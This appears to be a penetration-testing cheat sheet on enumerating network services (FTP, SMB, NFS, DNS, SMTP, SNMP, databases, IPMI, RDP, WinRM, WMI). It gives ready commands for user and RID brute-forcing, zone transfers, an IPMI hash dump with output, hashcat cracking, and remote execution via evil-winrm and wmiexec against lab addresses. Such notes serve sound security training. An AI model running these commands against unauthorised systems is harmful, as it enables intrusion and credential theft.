Service Enumeration

Enumerating the services on target

FTP

Ports: TCP 20, 21

Check for anonymous logins

Downloading all files from FTP using wget

$ wget -m --no-passive ftp://anonymous:anonymous@SERVER

Connect to FTP using SSL

$ openssl s_client -connect SERVER:21 -starttls ftp

SMB

Ports: TCP 139, 445

Check for anonymous logins

Listing SMB shares

$ smbclient -N -L //SERVER -U="<username>" --password="<password>"

$ smbclient //SERVER/notes -U="<username>" --password="<password>"

$ rpcclient -U "<username>" 10.129.14.128

RPC Query

Description

srvinfo

Server information

enumdomains

Enumerate all domains that are deployed in the network

querydominfo

Provides domain, server, and user information of deployed domains

netshareenumall

Enumerates all available shares

netsharegetinfo <SHARE>

Provides information about a specific share

enumdomusers

Enumerates all domain users

queryuser <USER_RID>

Provides information about a specific user

querygroup <GROUP_RID>

Provides information about a group

Brute Forcing Users RID

$ for i in $(seq 500 1100);do rpcclient -N -U "" SERVER -c "queryuser 0x$(printf '%x\n' $i)" | grep "User Name\|user_rid\|group_rid" && echo "";done

Or by using samrdump: https://github.com/SecureAuthCorp/impacket/blob/master/examples/samrdump.py

NFS

Ports: TCP/UDP 2049, 111

$ showmount -e <TARGET IP>

$ mount -t nfs <TARGET IP>:/<share name> ./<local folder>/ -o nolock

DNS

Port: UDP 53, TCP 53 for zone transfers

Get all record from a DNS server

$ dig any <hostname> @<IP>

Zone Transfer

This can be done recursively after discovering more subdomains

$ dig axfr <hostname> @<IP>

Brute force subdomains given a DNS server

This can be done recursively after discovering more subdomains

$ dnsenum --dnsserver <IP> --enum -p 0 -s 0 -f <wordlist> <domain>

SMTP

Ports: TCP 25, 465, 587, 2525

SMTP Open Relay Scanning with nmap

$ sudo nmap 10.129.14.128 -p25 --script smtp-open-relay -v

SMTP user enumeration

$ smtp-user-enum -M VRFY -U <usernames.txt> -t <TARGET IP> -w <wait time>

$ smtp-user-enum -M EXPN -U <usernames.txt> -t <TARGET IP> -w <wait time>

$ smtp-user-enum -M RCPT -U <usernames.txt> -t <TARGET IP> -w <wait time>

Evolution Mail Client

Once you have credentials for a valid account, install evolution and setup the account to that user

$ sudo apt install evolution

SNMP

Ports: UDP 161

SNMPwalk to enumerate SNMP service

$ snmpwalk -v2c -c <string> <TARGET IP>

Onesixtyone to brute force string

$ onesixtyone -c /usr/share/seclists/Discovery/SNMP/snmp.txt <TARGET IP>

MySQL

Ports: TCP 3306

Nmap script

$ sudo nmap <TARGET IP> -sV -sC -p3306 --script mysql*

MSSQL

Nmap script

$ sudo nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 <TARGET IP>

Connecting to MSSQL with python

Download the impacket mssql connector https://github.com/SecureAuthCorp/impacket/blob/master/examples/mssqlclient.py

$ python3 mssqlclient.py Administrator@<TARGET IP> -windows-auth

IPMI

Ports: UDP 623

Metasploit Dumping IPMI hashes

msf6 > use auxiliary/scanner/ipmi/ipmi_dumphashes 
msf6 auxiliary(scanner/ipmi/ipmi_dumphashes) > set rhosts 10.129.42.195
msf6 auxiliary(scanner/ipmi/ipmi_dumphashes) > show options 

Module options (auxiliary/scanner/ipmi/ipmi_dumphashes):

   Name                 Current Setting                                                    Required  Description
   ----                 ---------------                                                    --------  -----------
   CRACK_COMMON         true                                                               yes       Automatically crack common passwords as they are obtained
   OUTPUT_HASHCAT_FILE                                                                     no        Save captured password hashes in hashcat format
   OUTPUT_JOHN_FILE                                                                        no        Save captured password hashes in john the ripper format
   PASS_FILE            /usr/share/metasploit-framework/data/wordlists/ipmi_passwords.txt  yes       File containing common passwords for offline cracking, one per line
   RHOSTS               10.129.42.195                                                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT                623                                                                yes       The target port
   THREADS              1                                                                  yes       The number of concurrent threads (max one per host)
   USER_FILE            /usr/share/metasploit-framework/data/wordlists/ipmi_users.txt      yes       File containing usernames, one per line



msf6 auxiliary(scanner/ipmi/ipmi_dumphashes) > run

[+] 10.129.42.195:623 - IPMI - Hash found: ADMIN:8e160d4802040000205ee9253b6b8dac3052c837e23faa631260719fce740d45c3139a7dd4317b9ea123456789abcdefa123456789abcdef140541444d494e:a3e82878a09daa8ae3e6c22f9080f8337fe0ed7e
[+] 10.129.42.195:623 - IPMI - Hash for user 'ADMIN' matches password 'ADMIN'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

hashcat to crack HP iLO ipmi passwords

$ hashcat -m 7300 ipmi.txt -a 3 ?1?1?1?1?1?1?1?1 -1 ?d?u

hashcat to crack generic ipmi passwords

$ hashcat -m 7300 --username hash <wordlist>

RDP (Windows)

Ports: TCP 3389

Nmap script

$ nmap -sV -sC <TARGET IP> -p3389 --script rdp*

Connecting to RDP service

$ xfreerdp /u:cry0l1t3 /p:"<password>" /v:<TARGET IP>

WinRM (Windows)

Ports: TCP 5985, 5986

Nmap script

$ nmap -sV -sC <TARGET IP> -p5985,5986 --disable-arp-ping -n

evil-winrm

https://github.com/Hackplayers/evil-winrm

$ evil-winrm -i <TARGET IP> -u <username> -p <password>

WMI

Ports: TCP 135

wmiexec

https://github.com/SecureAuthCorp/impacket/blob/master/examples/wmiexec.py

$ /usr/share/doc/python3-impacket/examples/wmiexec.py Cry0l1t3:"P455w0rD!"@10.129.201.248 "hostname"

PreviousWebsite Recon NextExploitation

Last updated 3 years ago

hashtagFTP

hashtagDownloading all files from FTP using wget

hashtagConnect to FTP using SSL

hashtagSMB

hashtagListing SMB shares

hashtagConnecting to a SMB share

hashtagConnect to an SMB share using RPC

hashtagBrute Forcing Users RID

hashtagNFS

hashtagShow available NFS share

hashtagMounting NFS share

hashtagDNS

hashtagGet all record from a DNS server

hashtagZone Transfer

hashtagBrute force subdomains given a DNS server

hashtagSMTP

hashtagSMTP Open Relay Scanning with nmap

hashtagSMTP user enumeration

hashtagEvolution Mail Client

hashtagSNMP

hashtagSNMPwalk to enumerate SNMP service

hashtagMySQL

hashtagNmap script

hashtagMSSQL

hashtagNmap script

hashtagConnecting to MSSQL with python

hashtagIPMI

hashtagMetasploit Dumping IPMI hashes

hashtaghashcat to crack HP iLO ipmi passwords

hashtaghashcat to crack generic ipmi passwords

hashtagRDP (Windows)

hashtagNmap script

hashtagConnecting to RDP service

hashtagWinRM (Windows)

hashtagNmap script

hashtagevil-winrm

hashtagWMI

hashtagwmiexec

FTP

Downloading all files from FTP using wget

Connect to FTP using SSL

SMB

Listing SMB shares

Connecting to a SMB share

Connect to an SMB share using RPC

Brute Forcing Users RID

NFS

Show available NFS share

Mounting NFS share

DNS

Get all record from a DNS server

Zone Transfer

Brute force subdomains given a DNS server

SMTP

SMTP Open Relay Scanning with nmap

SMTP user enumeration

Evolution Mail Client

SNMP

SNMPwalk to enumerate SNMP service

MySQL

Nmap script

MSSQL

Nmap script

Connecting to MSSQL with python

IPMI

Metasploit Dumping IPMI hashes

hashcat to crack HP iLO ipmi passwords

hashcat to crack generic ipmi passwords

RDP (Windows)

Nmap script

Connecting to RDP service

WinRM (Windows)

Nmap script

evil-winrm

WMI

wmiexec